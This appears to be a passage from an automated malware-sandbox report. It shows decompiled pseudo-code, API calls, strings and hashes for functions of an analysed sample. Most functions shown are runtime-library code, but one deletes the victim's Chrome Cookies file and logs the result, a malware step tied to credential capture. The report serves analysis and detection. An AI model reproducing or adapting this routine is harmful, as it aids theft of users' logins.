							_t4 = E00432A92(__eflags,  *0x46c090, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t28 = E00440628(_t16, 1, 0x28);
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00432A92(__eflags,  *0x46c090, 0);
								} else {
									__eflags = E00432A92(__eflags,  *0x46c090, _t28);
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E004414D5(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}








                                                                                                0x00435e0f
                                                                                                0x00435e22
                                                                                                0x00435e29
                                                                                                0x00435e2c
                                                                                                0x00435e2f
                                                                                                0x00435e48
                                                                                                0x00435e48
                                                                                                0x00435e31
                                                                                                0x00435e31
                                                                                                0x00435e33
                                                                                                0x00435e3d
                                                                                                0x00435e43
                                                                                                0x00435e44
                                                                                                0x00435e46
                                                                                                0x00435e56
                                                                                                0x00435e5a
                                                                                                0x00435e5c
                                                                                                0x00435e70
                                                                                                0x00435e70
                                                                                                0x00435e79
                                                                                                0x00435e5e
                                                                                                0x00435e6c
                                                                                                0x00435e6e
                                                                                                0x00435e82
                                                                                                0x00435e84
                                                                                                0x00435e84
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00435e6e
                                                                                                0x00435e87
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00435e46
                                                                                                0x00435e33
                                                                                                0x00435e8f
                                                                                                0x00435e99
                                                                                                0x00435e11
                                                                                                0x00435e13
                                                                                                0x00435e13

                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,00435DFF,00433072), ref: 00435E16
                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00435E24
                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00435E3D
                                                                                                • SetLastError.KERNEL32(00000000,?,00435DFF,00433072), ref: 00435E8F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                • String ID:
                                                                                                • API String ID: 3852720340-0
                                                                                                • Opcode ID: cb87fc4e7ab6080456bdc9289be03dc4a92ec57eff74e1e72ad44e4ad525414a
                                                                                                • Instruction ID: be0b5738b31b3bf61627610657f800f576410448f4cbcb65cdff4a4e015be5f7
                                                                                                • Opcode Fuzzy Hash: cb87fc4e7ab6080456bdc9289be03dc4a92ec57eff74e1e72ad44e4ad525414a
                                                                                                • Instruction Fuzzy Hash: 6001283210D7269EA72027F67C8662B2745EB1D77DF30223FF224451E0FE994C41914E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00409FB8, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 75%
                                                                                                			E00409FB8(void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				void* __ebx;
				void* __ebp;
				long _t18;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t31;
				void* _t32;

				_t35 = __eflags;
				_t31 = __edi;
				_t30 = E00402076(_t20,  &_v52, E00437AFA(_t20, __eflags, "UserProfile"));
				E004076BB(_t20,  &_v28, _t7, _t31, _t35, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
				E00401FB9();
				if(DeleteFileA(E00401F87( &_v28)) != 0) {
					_t28 = _t32 - 0x18;
					_push("\n[Chrome Cookies found, cleared!]");
					goto L6;
				} else {
					_t18 = GetLastError();
					if(_t18 == 0 || _t18 == 1) {
						_t28 = _t32 - 0x18;
						_push("\n[Chrome Cookies not found]");
						L6:
						E00402076(_t20, _t28);
						E0040A724(_t20, _t30, __eflags);
						_t21 = 1;
					} else {
						_t21 = 0;
					}
				}
				E00401FB9();
				return _t21;
			}













                                                                                                0x00409fb8
                                                                                                0x00409fb8
                                                                                                0x00409fd8
                                                                                                0x00409fdd
                                                                                                0x00409fe6
                                                                                                0x00409ffc
                                                                                                0x0040a022
                                                                                                0x0040a024
                                                                                                0x00000000
                                                                                                0x00409ffe
                                                                                                0x0040a005
                                                                                                0x0040a008
                                                                                                0x0040a016
                                                                                                0x0040a018
                                                                                                0x0040a029
                                                                                                0x0040a029
                                                                                                0x0040a02e
                                                                                                0x0040a033
                                                                                                0x0040a00f
                                                                                                0x0040a00f
                                                                                                0x0040a00f
                                                                                                0x0040a008
                                                                                                0x0040a03b
                                                                                                0x0040a046

                                                                                                APIs
                                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 00409FF4
                                                                                                • GetLastError.KERNEL32 ref: 00409FFE
                                                                                                Strings
                                                                                                • [Chrome Cookies found, cleared!], xrefs: 0040A024
                                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 00409FBF
                                                                                                • [Chrome Cookies not found], xrefs: 0040A018
                                                                                                • UserProfile, xrefs: 00409FC4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteErrorFileLast
                                                                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                • API String ID: 2018770650-304995407
                                                                                                • Opcode ID: cc29e18477101dc447a5e55271d12bcfd984b136a0bfcfa5d1d94e7293382bb4
                                                                                                • Instruction ID: a7a5c4a42de72322af555cd48b85ace273aa37efb71ea2a29eb9d084ffcb1a21
                                                                                                • Opcode Fuzzy Hash: cc29e18477101dc447a5e55271d12bcfd984b136a0bfcfa5d1d94e7293382bb4
                                                                                                • Instruction Fuzzy Hash: 5701F731A4020956C604BAB5DD1B8AE7728A911348B50023BF402772D3FD7E9955C28F
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004364F9, Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 69%
                                                                                                			E004364F9(void* __ebx, signed int __edx, void* __edi, void* _a4, signed int _a8) {
				intOrPtr _v0;
				char _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				void* __esi;
				void* __ebp;
				signed int _t61;
				void* _t64;
				signed int _t67;
				signed int _t69;
				signed int _t70;
				signed int _t73;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				intOrPtr _t80;
				signed int _t81;
				void* _t82;
				signed int _t84;
				void* _t85;
				signed int _t87;
				signed int _t93;
				signed int _t102;
				void* _t104;
				signed int _t107;
				signed int* _t110;
				signed int* _t111;
				intOrPtr* _t113;
				signed int _t118;
				signed int _t120;
				signed int _t123;
				void* _t125;
				signed int _t128;
				signed int _t131;
				signed int _t139;
				signed int _t145;
				void _t147;
				void* _t148;
				void* _t150;
				void* _t152;
				signed int _t153;
				signed int _t154;
				void* _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;

				_t139 = __edx;
				_t155 = _a4;
				if(_t155 == 0) {
					_t113 = E00438932();
					_t159 = 0x16;
					 *_t113 = _t159;
					E00437709();
					return _t159;
				}
				_push(__edi);
				_t123 = 9;
				memset(_t155, _t61 | 0xffffffff, _t123 << 2);
				_t145 = _a8;
				__eflags = _t145;
				if(_t145 == 0) {
					_t111 = E00438932();
					_t158 = 0x16;
					 *_t111 = _t158;
					E00437709();
					_t78 = _t158;
					L12:
					return _t78;
				}
				_push(__ebx);
				__eflags =  *(_t145 + 4);
				if(__eflags <= 0) {
					if(__eflags < 0) {
						L10:
						_t110 = E00438932();
						_t157 = 0x16;
						 *_t110 = _t157;
						_t78 = _t157;
						L11:
						goto L12;
					}
					__eflags =  *_t145;
					if( *_t145 < 0) {
						goto L10;
					}
				}
				_t64 = 7;
				__eflags =  *(_t145 + 4) - _t64;
				if(__eflags >= 0) {
					if(__eflags > 0) {
						goto L10;
					}
					__eflags =  *_t145 - 0x93406fff;
					if(__eflags > 0) {
						goto L10;
					}
				}
				E004442F3(0, _t145, _t155, __eflags);
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_t67 = E00443B28( &_v12);
				_pop(_t125);
				__eflags = _t67;
				if(_t67 == 0) {
					_t75 = E00443B54( &_v16);
					_pop(_t125);
					__eflags = _t75;
					if(_t75 == 0) {
						_t77 = E00443B80( &_v8);
						_pop(_t125);
						__eflags = _t77;
						if(_t77 == 0) {
							_t118 =  *(_t145 + 4);
							_t128 =  *_t145;
							__eflags = _t118;
							if(__eflags < 0) {
								L28:
								_push(_t145);
								_push(_t155);
								_t78 = E0043D9B7();
								__eflags = _t78;
								if(_t78 != 0) {
									goto L11;
								}
								__eflags = _v12;
								asm("cdq");
								_t147 =  *_t155;
								_t120 = _t139;
								if(__eflags == 0) {
									L32:
									_t80 = _v8;
									L33:
									asm("cdq");
									_t148 = _t147 - _t80;
									asm("sbb ebx, edx");
									_t81 = E00451E10(_t148, _t120, 0x3c, 0);
									 *_t155 = _t81;
									__eflags = _t81;
									if(_t81 < 0) {
										_t148 = _t148 + 0xffffffc4;
										 *_t155 = _t81 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t82 = E00451D60(_t148, _t120, 0x3c, 0);
									_t121 = _t139;
									_t28 = _t155 + 4; // 0x848d0046
									asm("cdq");
									_t150 = _t82 +  *_t28;
									asm("adc ebx, edx");
									_t84 = E00451E10(_t150, _t139, 0x3c, 0);
									 *(_t155 + 4) = _t84;
									__eflags = _t84;
									if(_t84 < 0) {
										_t150 = _t150 + 0xffffffc4;
										 *(_t155 + 4) = _t84 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t85 = E00451D60(_t150, _t121, 0x3c, 0);
									_t122 = _t139;
									_t31 = _t155 + 8; // 0xa824
									asm("cdq");
									_t152 = _t85 +  *_t31;
									asm("adc ebx, edx");
									_t87 = E00451E10(_t152, _t139, 0x18, 0);
									 *(_t155 + 8) = _t87;
									__eflags = _t87;
									if(_t87 < 0) {
										_t152 = _t152 + 0xffffffe8;
										 *(_t155 + 8) = _t87 + 0x18;
										asm("adc ebx, 0xffffffff");
									}
									_t131 = E00451D60(_t152, _t122, 0x18, 0);
									__eflags = _t139;
									if(__eflags < 0) {
										L48:
										_t44 = _t155 + 0x18; // 0xa024848d
										 *(_t155 + 0xc) =  *(_t155 + 0xc) + _t131;
										asm("cdq");
										_t153 = 7;
										_t51 = _t155 + 0xc; // 0x50506a00
										_t93 =  *_t51;
										 *(_t155 + 0x18) = ( *_t44 + 7 + _t131) % _t153;
										__eflags = _t93;
										if(_t93 > 0) {
											goto L43;
										}
										 *((intOrPtr*)(_t155 + 0x10)) = 0xb;
										 *(_t155 + 0xc) = _t93 + 0x1f;
										_t55 = _t131 + 0x16d; // 0x16d
										 *(_t155 + 0x1c) =  *(_t155 + 0x1c) + _t55;
										 *((intOrPtr*)(_t155 + 0x14)) =  *((intOrPtr*)(_t155 + 0x14)) - 1;
										goto L44;
									} else {
										if(__eflags > 0) {
											L42:
											_t34 = _t155 + 0x18; // 0xa024848d
											asm("cdq");
											_t154 = 7;
											_t39 = _t155 + 0xc;
											 *_t39 =  *(_t155 + 0xc) + _t131;
											__eflags =  *_t39;
											 *(_t155 + 0x18) = ( *_t34 + _t131) % _t154;
											L43:
											_t42 = _t155 + 0x1c;
											 *_t42 =  *(_t155 + 0x1c) + _t131;
											__eflags =  *_t42;
											L44:
											_t78 = 0;
											goto L11;
										}
										__eflags = _t131;
										if(_t131 == 0) {
											__eflags = _t139;
											if(__eflags > 0) {
												goto L44;
											}
											if(__eflags < 0) {
												goto L48;
											}
											__eflags = _t131;
											if(_t131 >= 0) {
												goto L44;
											}
											goto L48;
										}
										goto L42;
									}
								}
								_push(_t155);
								_t102 = E00444344(_t120, _t147, _t155, __eflags);
								__eflags = _t102;
								if(_t102 == 0) {
									goto L32;
								}
								_t80 = _v8 + _v16;
								 *((intOrPtr*)(_t155 + 0x20)) = 1;
								goto L33;
							}
							if(__eflags > 0) {
								L20:
								_t104 = 7;
								__eflags = _t118 - _t104;
								if(__eflags > 0) {
									goto L28;
								}
								if(__eflags < 0) {
									L23:
									asm("cdq");
									_push( &_v24);
									asm("sbb ebx, edx");
									_v24 = _t128 - _v8;
									_push(_t155);
									_v20 = _t118;
									_t78 = E0043D9B7();
									__eflags = _t78;
									if(_t78 != 0) {
										goto L11;
									}
									__eflags = _v12 - _t78;
									if(__eflags == 0) {
										goto L44;
									}
									_push(_t155);
									_t107 = E00444344(_t118, _t145, _t155, __eflags);
									__eflags = _t107;
									if(_t107 == 0) {
										goto L44;
									}
									asm("cdq");
									_v24 = _v24 - _v16;
									_push( &_v24);
									asm("sbb [ebp-0x10], edx");
									_push(_t155);
									_t78 = E0043D9B7();
									__eflags = _t78;
									if(_t78 != 0) {
										goto L11;
									}
									 *((intOrPtr*)(_t155 + 0x20)) = 1;
									goto L44;
								}
								__eflags = _t128 - 0x933c7b7f;
								if(_t128 >= 0x933c7b7f) {
									goto L28;
								}
								goto L23;
							}
							__eflags = _t128 - 0x3f480;
							if(_t128 <= 0x3f480) {
								goto L28;
							}
							goto L20;
						}
					}
				}
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				E00437736();
				asm("int3");
				_push(_t155);
				_t69 = E0043D952(_t125);
				_t156 = _t69;
				__eflags = _t156;
				if(_t156 != 0) {
					_push(_v0);
					_t70 = E004364F9(0, _t139, _t145, _t156);
					asm("sbb eax, eax");
					_t73 =  !( ~_t70) & _t156;
					__eflags = _t73;
					return _t73;
				}
				return _t69;
			}




















































                                                                                                0x004364f9
                                                                                                0x00436502
                                                                                                0x00436507
                                                                                                0x00436509
                                                                                                0x00436510
                                                                                                0x00436511
                                                                                                0x00436513
                                                                                                0x00000000
                                                                                                0x00436518
                                                                                                0x0043651c
                                                                                                0x00436524
                                                                                                0x00436525
                                                                                                0x00436527
                                                                                                0x0043652a
                                                                                                0x0043652c
                                                                                                0x0043652e
                                                                                                0x00436535
                                                                                                0x00436536
                                                                                                0x00436538
                                                                                                0x0043653d
                                                                                                0x0043656e
                                                                                                0x00000000
                                                                                                0x0043656e
                                                                                                0x00436541
                                                                                                0x00436544
                                                                                                0x00436547
                                                                                                0x00436549
                                                                                                0x00436561
                                                                                                0x00436561
                                                                                                0x00436568
                                                                                                0x00436569
                                                                                                0x0043656b
                                                                                                0x0043656d
                                                                                                0x00000000
                                                                                                0x0043656d
                                                                                                0x0043654b
                                                                                                0x0043654d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043654d
                                                                                                0x00436551
                                                                                                0x00436552
                                                                                                0x00436555
                                                                                                0x00436557
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00436559
                                                                                                0x0043655f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043655f
                                                                                                0x00436574
                                                                                                0x0043657c
                                                                                                0x00436580
                                                                                                0x00436583
                                                                                                0x00436586
                                                                                                0x0043658b
                                                                                                0x0043658c
                                                                                                0x0043658e
                                                                                                0x00436598
                                                                                                0x0043659d
                                                                                                0x0043659e
                                                                                                0x004365a0
                                                                                                0x004365aa
                                                                                                0x004365af
                                                                                                0x004365b0
                                                                                                0x004365b2
                                                                                                0x004365b8
                                                                                                0x004365bb
                                                                                                0x004365bd
                                                                                                0x004365bf
                                                                                                0x00436640
                                                                                                0x00436640
                                                                                                0x00436641
                                                                                                0x00436642
                                                                                                0x00436649
                                                                                                0x0043664b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00436651
                                                                                                0x00436657
                                                                                                0x00436658
                                                                                                0x0043665a
                                                                                                0x0043665c
                                                                                                0x00436678
                                                                                                0x00436678
                                                                                                0x0043667b
                                                                                                0x0043667b
                                                                                                0x0043667c
                                                                                                0x00436682
                                                                                                0x00436686
                                                                                                0x0043668b
                                                                                                0x0043668d
                                                                                                0x0043668f
                                                                                                0x00436694
                                                                                                0x00436697
                                                                                                0x00436699
                                                                                                0x00436699
                                                                                                0x004366a2
                                                                                                0x004366a9
                                                                                                0x004366ab
                                                                                                0x004366ae
                                                                                                0x004366af
                                                                                                0x004366b5
                                                                                                0x004366b9
                                                                                                0x004366be
                                                                                                0x004366c1
                                                                                                0x004366c3
                                                                                                0x004366c8
                                                                                                0x004366cb
                                                                                                0x004366ce
                                                                                                0x004366ce
                                                                                                0x004366d7
                                                                                                0x004366de
                                                                                                0x004366e0
                                                                                                0x004366e3
                                                                                                0x004366e4
                                                                                                0x004366ea
                                                                                                0x004366ee
                                                                                                0x004366f3
                                                                                                0x004366f6
                                                                                                0x004366f8
                                                                                                0x004366fd
                                                                                                0x00436700
                                                                                                0x00436703
                                                                                                0x00436703
                                                                                                0x00436711
                                                                                                0x00436713
                                                                                                0x00436715
                                                                                                0x00436742
                                                                                                0x00436742
                                                                                                0x00436748
                                                                                                0x0043674f
                                                                                                0x00436750
                                                                                                0x00436753
                                                                                                0x00436753
                                                                                                0x00436756
                                                                                                0x00436759
                                                                                                0x0043675b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00436760
                                                                                                0x00436767
                                                                                                0x0043676a
                                                                                                0x00436770
                                                                                                0x00436773
                                                                                                0x00000000
                                                                                                0x00436717
                                                                                                0x00436717
                                                                                                0x0043671d
                                                                                                0x0043671d
                                                                                                0x00436724
                                                                                                0x00436725
                                                                                                0x00436728
                                                                                                0x00436728
                                                                                                0x00436728
                                                                                                0x0043672b
                                                                                                0x0043672e
                                                                                                0x0043672e
                                                                                                0x0043672e
                                                                                                0x0043672e
                                                                                                0x00436731
                                                                                                0x00436731
                                                                                                0x00000000
                                                                                                0x00436731
                                                                                                0x00436719
                                                                                                0x0043671b
                                                                                                0x00436738
                                                                                                0x0043673a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043673c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043673e
                                                                                                0x00436740
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00436740
                                                                                                0x00000000
                                                                                                0x0043671b
                                                                                                0x00436715
                                                                                                0x0043665e
                                                                                                0x0043665f
                                                                                                0x00436665
                                                                                                0x00436667
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043666c
                                                                                                0x0043666f
                                                                                                0x00000000
                                                                                                0x0043666f
                                                                                                0x004365c1
                                                                                                0x004365cb
                                                                                                0x004365cd
                                                                                                0x004365ce
                                                                                                0x004365d0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004365d2
                                                                                                0x004365dc
                                                                                                0x004365df
                                                                                                0x004365e5
                                                                                                0x004365e6
                                                                                                0x004365e8
                                                                                                0x004365eb
                                                                                                0x004365ec
                                                                                                0x004365ef
                                                                                                0x004365f6
                                                                                                0x004365f8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004365fe
                                                                                                0x00436601
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00436607
                                                                                                0x00436608
                                                                                                0x0043660e
                                                                                                0x00436610
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00436619
                                                                                                0x0043661a
                                                                                                0x00436620
                                                                                                0x00436621
                                                                                                0x00436624
                                                                                                0x00436625
                                                                                                0x0043662c
                                                                                                0x0043662e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00436634
                                                                                                0x00000000
                                                                                                0x00436634
                                                                                                0x004365d4
                                                                                                0x004365da
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004365da
                                                                                                0x004365c3
                                                                                                0x004365c9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004365c9
                                                                                                0x004365b2
                                                                                                0x004365a0
                                                                                                0x00436778
                                                                                                0x00436779
                                                                                                0x0043677a
                                                                                                0x0043677b
                                                                                                0x0043677c
                                                                                                0x0043677d
                                                                                                0x00436782
                                                                                                0x00436788
                                                                                                0x00436789
                                                                                                0x0043678e
                                                                                                0x00436790
                                                                                                0x00436792
                                                                                                0x00436794
                                                                                                0x00436798
                                                                                                0x004367a0
                                                                                                0x004367a5
                                                                                                0x004367a5
                                                                                                0x00000000
                                                                                                0x004367a5
                                                                                                0x004367a9

                                                                                                APIs
                                                                                                • __allrem.LIBCMT ref: 00436686
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004366A2
                                                                                                • __allrem.LIBCMT ref: 004366B9
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004366D7
                                                                                                • __allrem.LIBCMT ref: 004366EE
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043670C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                • String ID:
                                                                                                • API String ID: 1992179935-0
                                                                                                • Opcode ID: 41b244261037025de60c53adad566b4577aa25982cd7a6b85438bda2ac35dcad
                                                                                                • Instruction ID: 4e631c2561c11cb6d70fa929807129eb316fc76fd6130e53e82cbf7efa599a77
                                                                                                • Opcode Fuzzy Hash: 41b244261037025de60c53adad566b4577aa25982cd7a6b85438bda2ac35dcad
                                                                                                • Instruction Fuzzy Hash: 6781E772A00707BBE7209E69DC42B6F73A89F48768F25953FF411D6381EB78D9008798
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0044042E, Relevance: 9.2, APIs: 6, Instructions: 200COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 80%
                                                                                                			E0044042E(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				char _v48;
				void* __ecx;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t75;
				intOrPtr _t76;
				signed int _t79;
				signed int _t86;
				intOrPtr _t88;
				signed int _t99;
				void* _t101;
				void* _t103;
				void* _t108;
				signed int _t112;
				signed int _t113;
				signed int _t116;
				signed int _t123;
				signed int _t125;
				intOrPtr _t126;
				signed int _t128;
				intOrPtr _t130;
				signed int _t131;
				void* _t135;
				void* _t136;
				void* _t138;

				_t120 = __edx;
				_t97 = __ebx;
				_push(_t101);
				if(_a8 != 0) {
					_push(__esi);
					_push(__edi);
					_t123 = 0;
					_t67 = E00439242( &_v8, 0, 0, _a8, 0x7fffffff);
					_t136 = _t135 + 0x14;
					__eflags = _t67;
					if(_t67 == 0) {
						L5:
						_t128 = E00440628(_t101, _v8, 2);
						_pop(_t103);
						__eflags = _t128;
						if(_t128 == 0) {
							L11:
							E004414D5(_t128);
							_t70 = _t123;
							goto L12;
						} else {
							_t71 = E00439242(_t123, _t128, _v8, _a8, 0xffffffff);
							_t136 = _t136 + 0x14;
							__eflags = _t71;
							if(_t71 == 0) {
								_t123 = E0043F7B0(_t97, _t103, _t120, _a4, _t128);
								goto L11;
							} else {
								__eflags = _t71 - 0x16;
								if(_t71 == 0x16) {
									goto L13;
								} else {
									__eflags = _t71 - 0x22;
									if(_t71 != 0x22) {
										goto L11;
									} else {
										goto L13;
									}
								}
							}
						}
					} else {
						__eflags = _t67 - 0x16;
						if(_t67 == 0x16) {
							L13:
							_push(_t123);
							_push(_t123);
							_push(_t123);
							_push(_t123);
							E00437736();
							asm("int3");
							E004308A0(0x469390, 0x1c);
							_t130 = _a4;
							_t75 = E0044042E(_t97, _t120, _t123, _t130, _t130, _a8);
							_t108 = _t123;
							_t125 = _t75;
							__eflags = _t125;
							if(_t125 != 0) {
								_t76 = E00442F68(_t97, _t108, _t120);
								_v40 = _t76;
								_v48 =  *((intOrPtr*)(_t76 + 0x4c));
								_t110 =  *((intOrPtr*)(_t76 + 0x48));
								_v44 =  *((intOrPtr*)(_t76 + 0x48));
								_v32 = 0;
								_t79 = E0043996B( *((intOrPtr*)(_t76 + 0x48)),  &_v32, 0, 0, _t125, 0,  &_v48);
								_t138 = _t136 + 0x18;
								__eflags = _t79;
								if(_t79 == 0) {
									L22:
									_t99 = E00440C6C(_t110, _v32 + 4);
									__eflags = _t99;
									if(_t99 == 0) {
										goto L15;
									} else {
										_t20 = _t99 + 4; // 0x4
										_v36 = _t20;
										_t110 =  &_v48;
										_t125 = 0;
										_t86 = E0043996B( &_v48, 0, _t20, _v32, 0, 0xffffffff,  &_v48);
										_t138 = _t138 + 0x18;
										__eflags = _t86;
										if(_t86 == 0) {
											L29:
											_t126 = _v48;
											E004403BD(4);
											_pop(_t112);
											_v8 = _v8 & 0x00000000;
											_t131 = _t130 + _t130;
											_t113 = _t112 | 0xffffffff;
											__eflags =  *(_t126 + 0x24 + _t131 * 8);
											if(__eflags != 0) {
												asm("lock xadd [edx], eax");
												if(__eflags == 0) {
													E004414D5( *(_t126 + 0x24 + _t131 * 8));
													_pop(_t116);
													 *(_t126 + 0x24 + _t131 * 8) =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
													_t113 = _t116 | 0xffffffff;
													__eflags = _t113;
												}
											}
											_t88 = _v40;
											__eflags =  *(_t88 + 0x350) & 0x00000002;
											if(( *(_t88 + 0x350) & 0x00000002) == 0) {
												__eflags =  *0x46c994 & 0x00000001;
												if(( *0x46c994 & 0x00000001) == 0) {
													__eflags =  *(_t126 + 0x24 + _t131 * 8);
													if( *(_t126 + 0x24 + _t131 * 8) != 0) {
														asm("lock xadd [eax], ecx");
														__eflags = _t113 == 1;
														if(_t113 == 1) {
															E004414D5( *(_t126 + 0x24 + _t131 * 8));
															_t51 = _t126 + 0x24 + _t131 * 8;
															 *_t51 =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
															__eflags =  *_t51;
														}
													}
												}
											}
											 *_t99 =  *((intOrPtr*)(_t126 + 0xc));
											 *(_t126 + 0x24 + _t131 * 8) = _t99;
											 *((intOrPtr*)(_t126 + 0x1c + _t131 * 8)) = _v36;
											_v8 = 0xfffffffe;
											E0044061F();
										} else {
											__eflags = _t86 - 0x16;
											if(_t86 == 0x16) {
												L26:
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												goto L20;
											} else {
												__eflags = _t86 - 0x22;
												if(_t86 != 0x22) {
													__eflags = _t86;
													if(_t86 == 0) {
														goto L29;
													} else {
														E004414D5(_t99);
														goto L15;
													}
												} else {
													goto L26;
												}
											}
										}
									}
								} else {
									__eflags = _t79 - 0x16;
									if(_t79 == 0x16) {
										L19:
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										L20:
										_t79 = E00437736();
									} else {
										__eflags = _t79 - 0x22;
										if(_t79 == 0x22) {
											goto L19;
										}
									}
									__eflags = _t79;
									if(_t79 != 0) {
										goto L15;
									} else {
										goto L22;
									}
								}
							} else {
								L15:
							}
							return E004308E6();
						} else {
							__eflags = _t67 - 0x22;
							if(_t67 == 0x22) {
								goto L13;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t70 = E0043F7B0(__ebx, _t101, __edx, _a4, 0);
					L12:
					return _t70;
				}
			}


































                                                                                                0x0044042e
                                                                                                0x0044042e
                                                                                                0x00440433
                                                                                                0x00440438
                                                                                                0x00440448
                                                                                                0x00440449
                                                                                                0x00440452
                                                                                                0x0044045a
                                                                                                0x0044045f
                                                                                                0x00440462
                                                                                                0x00440464
                                                                                                0x00440470
                                                                                                0x0044047a
                                                                                                0x0044047d
                                                                                                0x0044047e
                                                                                                0x00440480
                                                                                                0x004404b1
                                                                                                0x004404b2
                                                                                                0x004404b8
                                                                                                0x00000000
                                                                                                0x00440482
                                                                                                0x0044048c
                                                                                                0x00440491
                                                                                                0x00440494
                                                                                                0x00440496
                                                                                                0x004404af
                                                                                                0x00000000
                                                                                                0x00440498
                                                                                                0x00440498
                                                                                                0x0044049b
                                                                                                0x00000000
                                                                                                0x0044049d
                                                                                                0x0044049d
                                                                                                0x004404a0
                                                                                                0x00000000
                                                                                                0x004404a2
                                                                                                0x00000000
                                                                                                0x004404a2
